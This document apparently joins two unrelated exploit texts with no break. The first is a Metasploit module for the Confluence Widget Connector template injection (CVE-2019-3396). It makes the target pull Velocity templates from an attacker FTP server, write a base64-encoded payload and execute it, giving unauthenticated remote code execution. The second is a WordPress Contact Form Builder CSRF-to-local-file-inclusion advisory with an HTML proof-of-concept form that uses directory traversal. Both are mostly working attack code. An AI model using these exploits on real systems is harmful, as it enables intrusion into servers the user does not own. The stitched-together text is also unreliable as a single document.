Rank = ExcellentRanking
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::FtpServer
def initialize(info={})
super(update_info(info,
'Name' => "Atlassian Confluence Widget Connector Macro Velocity Template Injection",
'Description' => %q{
Widget Connector Macro is part of Atlassian Confluence Server and Data Center that
allows embed online videos, slideshows, photostreams and more directly into page.
A _template parameter can be used to inject remote Java code into a Velocity template,
and gain code execution. Authentication is unrequired to exploit this vulnerability.
By default, Java payload will be used because it is cross-platform, but you can also
specify which native payload you want (Linux or Windows).
Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version
6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected.
This vulnerability was originally discovered by Daniil Dmitriev
https://twitter.com/ddv_ua.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Daniil Dmitriev', # Discovering vulnerability
'Dmitry (rrock) Shchannikov' # Metasploit module
],
'References' =>
[
[ 'CVE', '2019-3396' ],
[ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html' ],
[ 'URL', 'https://chybeta.github.io/2019/04/06/Analysis-for-【CVE-2019-3396】-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/'],
[ 'URL', 'https://paper.seebug.org/886/']
],
'Targets' =>
[
[ 'Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA }],
[ 'Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 }],
[ 'Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 }]
],
'DefaultOptions' =>
{
'RPORT' => 8090,
'SRVPORT' => 8021,
},
'Privileged' => false,
'DisclosureDate' => 'Mar 25 2019',
'DefaultTarget' => 0,
'Stance' => Msf::Exploit::Stance::Aggressive
))
register_options(
[
OptString.new('TARGETURI', [true, 'The base to Confluence', '/']),
OptString.new('TRIGGERURL', [true, 'Url to external video service to trigger vulnerability',
'https://www.youtube.com/watch?v=dQw4w9WgXcQ'])
])
end
# Handles ftp RETP command.
#
# @param c [Socket] Control connection socket.
# @param arg [String] RETR argument.
# @return [void]
def on_client_command_retr(c, arg)
vprint_status("FTP download request for #{arg}")
conn = establish_data_connection(c)
if(not conn)
c.put("425 Can't build data connection\r\n")
return
end
c.put("150 Opening BINARY mode data connection for #{arg}\r\n")
case arg
when /check\.vm$/
conn.put(wrap(get_check_vm))
when /javaprop\.vm$/
conn.put(wrap(get_javaprop_vm))
when /upload\.vm$/
conn.put(wrap(get_upload_vm))
when /exec\.vm$/
conn.put(wrap(get_exec_vm))
else
conn.put(wrap(get_dummy_vm))
end
c.put("226 Transfer complete.\r\n")
conn.close
end
# Handles ftp PASS command to suppress output.
#
# @param c [Socket] Control connection socket.
# @param arg [String] PASS argument.
# @return [void]
def on_client_command_pass(c, arg)
@state[c][:pass] = arg
vprint_status("#{@state[c][:name]} LOGIN #{@state[c][:user]} / #{@state[c][:pass]}")
c.put "230 Login OK\r\n"
end
# Handles ftp EPSV command to suppress output.
#
# @param c [Socket] Control connection socket.
# @param arg [String] EPSV argument.
# @return [void]
def on_client_command_epsv(c, arg)
vprint_status("#{@state[c][:name]} UNKNOWN 'EPSV #{arg}'")
c.put("500 'EPSV #{arg}': command not understood.\r\n")
end
# Returns a upload template.
#
# @return [String]
def get_upload_vm
(
<<~EOF
$i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{@fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{@b64}'))
EOF
)
end
# Returns a command execution template.
#
# @return [String]
def get_exec_vm
(
<<~EOF
$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{@command}').waitFor()
EOF
)
end
# Returns checking template.
#
# @return [String]
def get_check_vm
(
<<~EOF
#{@check_text}
EOF
)
end
# Returns Java's getting property template.
#
# @return [String]
def get_javaprop_vm
(
<<~EOF
$i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{@prop}').toString()
EOF
)
end
# Returns dummy template.
#
# @return [String]
def get_dummy_vm
(
<<~EOF
EOF
)
end
# Checks the vulnerability.
#
# @return [Array] Check code
def check
checkcode = Exploit::CheckCode::Safe
begin
# Start the FTP service
print_status("Starting the FTP server.")
start_service
@check_text = Rex::Text.rand_text_alpha(5..10)
res = inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}check.vm")
if res && res.body && res.body.include?(@check_text)
checkcode = Exploit::CheckCode::Vulnerable
end
rescue Msf::Exploit::Failed => e
vprint_error(e.message)
checkcode = Exploit::CheckCode::Unknown
end
checkcode
end
# Injects Java code to the template.
#
# @param service_url [String] Address of template to injection.
# @return [void]
def inject_template(service_url, timeout=20)
uri = normalize_uri(target_uri.path, 'rest', 'tinymce', '1', 'macro', 'preview')
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'headers' => {
'Accept' => '*/*',
'Origin' => full_uri(vhost_uri: true)
},
'ctype' => 'application/json; charset=UTF-8',
'data' => {
'contentId' => '1',
'macro' => {
'name' => 'widget',
'body' => '',
'params' => {
'url' => datastore['TRIGGERURL'],
'_template' => service_url
}
}
}.to_json
}, timeout=timeout)
unless res
unless service_url.include?("exec.vm")
print_warning('Connection timed out in #inject_template')
end
return
end
if res.body.include? 'widget-error'
print_error('Failed to inject and execute code:')
else
vprint_status("Server response:")
end
vprint_line(res.body)
res
end
# Returns a system property for Java.
#
# @param prop [String] Name of the property to retrieve.
# @return [String]
def get_java_property(prop)
@prop = prop
res = inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm")
if res && res.body
return clear_response(res.body)
end
''
end
# Returns the target platform.
#
# @return [String]
def get_target_platform
return get_java_property('os.name')
end
# Checks if the target os/platform is compatible with the module target or not.
#
# @return [TrueClass] Compatible
# @return [FalseClass] Not compatible
def target_platform_compat?(target_platform)
target.platform.names.each do |n|
if n.downcase == 'java' || target_platform.downcase.include?(n.downcase)
return true
end
end
false
end
# Returns a temp path from the remote target.
#
# @return [String]
def get_tmp_path
return get_java_property('java.io.tmpdir')
end
# Returns the Java home path used by Confluence.
#
# @return [String]
def get_java_home_path
return get_java_property('java.home')
end
# Returns Java code that can be used to inject to the template in order to copy a file.
#
# @note The purpose of this method is to have a file that is not busy, so we can execute it.
# It is meant to be used with #get_write_file_code.
#
# @param fname [String] The file to copy
# @param new_fname [String] The new file
# @return [void]
def get_dup_file_code(fname, new_fname)
if fname =~ /^\/[[:print:]]+/
@command = "cp #{fname} #{new_fname}"
else
@command = "cmd.exe /C copy #{fname} #{new_fname}"
end
inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm")
end
# Returns the normalized file path for payload.
#
# @return [String]
def normalize_payload_fname(tmp_path, fname)
# A quick way to check platform insteaf of actually grabbing os.name in Java system properties.
if /^\/[[:print:]]+/ === tmp_path
Rex::FileUtils.normalize_unix_path(tmp_path, fname)
else
Rex::FileUtils.normalize_win_path(tmp_path, fname)
end
end
# Exploits the target in Java platform.
#
# @return [void]
def exploit_as_java
tmp_path = get_tmp_path
if tmp_path.blank?
fail_with(Failure::Unknown, 'Unable to get the temp path.')
end
@fname = normalize_payload_fname(tmp_path, "#{Rex::Text.rand_text_alpha(5)}.jar")
@b64 = Rex::Text.encode_base64(payload.encoded_jar)
@command = ''
java_home = get_java_home_path
if java_home.blank?
fail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.')
else
vprint_status("Found Java home path: #{java_home}")
end
register_files_for_cleanup(@fname)
if /^\/[[:print:]]+/ === @fname
normalized_java_path = Rex::FileUtils.normalize_unix_path(java_home, '/bin/java')
@command = %Q|#{normalized_java_path} -jar #{@fname}|
else
normalized_java_path = Rex::FileUtils.normalize_win_path(java_home, '\\bin\\java.exe')
@fname.gsub!(/Program Files/, 'PROGRA~1')
@command = %Q|cmd.exe /C "#{normalized_java_path}" -jar #{@fname}|
end
print_status("Attempting to upload #{@fname}")
inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
print_status("Attempting to execute #{@fname}")
inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
end
# Exploits the target in Windows platform.
#
# @return [void]
def exploit_as_windows
tmp_path = get_tmp_path
if tmp_path.blank?
fail_with(Failure::Unknown, 'Unable to get the temp path.')
end
@b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))
@fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe")
new_fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe")
@fname.gsub!(/Program Files/, 'PROGRA~1')
new_fname.gsub!(/Program Files/, 'PROGRA~1')
register_files_for_cleanup(@fname, new_fname)
print_status("Attempting to upload #{@fname}")
inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
print_status("Attempting to copy payload to #{new_fname}")
get_dup_file_code(@fname, new_fname)
print_status("Attempting to execute #{new_fname}")
@command = new_fname
inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
end
# Exploits the target in Linux platform.
#
# @return [void]
def exploit_as_linux
tmp_path = get_tmp_path
if tmp_path.blank?
fail_with(Failure::Unknown, 'Unable to get the temp path.')
end
@b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))
@fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5))
new_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6))
register_files_for_cleanup(@fname, new_fname)
print_status("Attempting to upload #{@fname}")
inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
@command = "chmod +x #{@fname}"
inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm")
print_status("Attempting to copy payload to #{new_fname}")
get_dup_file_code(@fname, new_fname)
print_status("Attempting to execute #{new_fname}")
@command = new_fname
inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
end
def exploit
@wrap_marker = Rex::Text.rand_text_alpha(5..10)
# Start the FTP service
print_status("Starting the FTP server.")
start_service
target_platform = get_target_platform
if target_platform.nil?
fail_with(Failure::Unreachable, 'Target did not respond to OS check. Confirm RHOSTS and RPORT, then run "check".')
else
print_status("Target being detected as: #{target_platform}")
end
unless target_platform_compat?(target_platform)
fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.')
end
case target.name.downcase
when /java$/
exploit_as_java
when /windows$/
exploit_as_windows
when /linux$/
exploit_as_linux
end
end
# Wraps request.
#
# @return [String]
def wrap(string)
"#{@wrap_marker}\n#{string}#{@wrap_marker}\n"
end
# Returns unwrapped response.
#
# @return [String]
def clear_response(string)
if match = string.match(/#{@wrap_marker}\n(.*)\n#{@wrap_marker}\n/m)
return match.captures[0]
end
end
end
# Exploit Title: Contact Form Builder [CSRF → LFI]
# Date: 2019-03-17
# Exploit Author: Panagiotis Vagenas
# Vendor Homepage: http://web-dorado.com/
# Software Link: https://wordpress.org/plugins/contact-form-builder
# Version: 1.0.67
# Tested on: WordPress 5.1.1
Description
-----------
Plugin implements the following AJAX actions:
- `ContactFormMakerPreview`
- `ContactFormmakerwdcaptcha`
- `nopriv_ContactFormmakerwdcaptcha`
- `CFMShortcode`
All of them call the function `contact_form_maker_ajax`. This function
dynamicaly loads a file defined in `$_GET['action']` or
`$_POST['action']` if the former is not defined. Because of the way
WordPress defines the AJAX action a user could define the plugin action
in the `$_GET['action']` and AJAX action in `$_POST['action']`.
Leveraging that and the fact that no sanitization is performed on the
`$_GET['action']`, a malicious actor can perform a CSRF attack to load a
file using directory traversal thus leading to Local File Inclusion
vulnerability.
PoC
---
```html
<form method="post"
action="http://wp-csrf-new.test/wp-admin/admin-ajax.php?action=/../../../../../../index">
<label>AJAX action:
<select name="action">
<option
value="ContactFormMakerPreview">ContactFormMakerPreview</option>
<option
value="ContactFormmakerwdcaptcha">ContactFormmakerwdcaptcha</option>
<option
value="nopriv_ContactFormmakerwdcaptcha">nopriv_ContactFormmakerwdcaptcha</option>
<option value="CFMShortcode">CFMShortcode</option>
</select>
</label>
<button type="submit" value="Submit">Submit</button>
</form>
```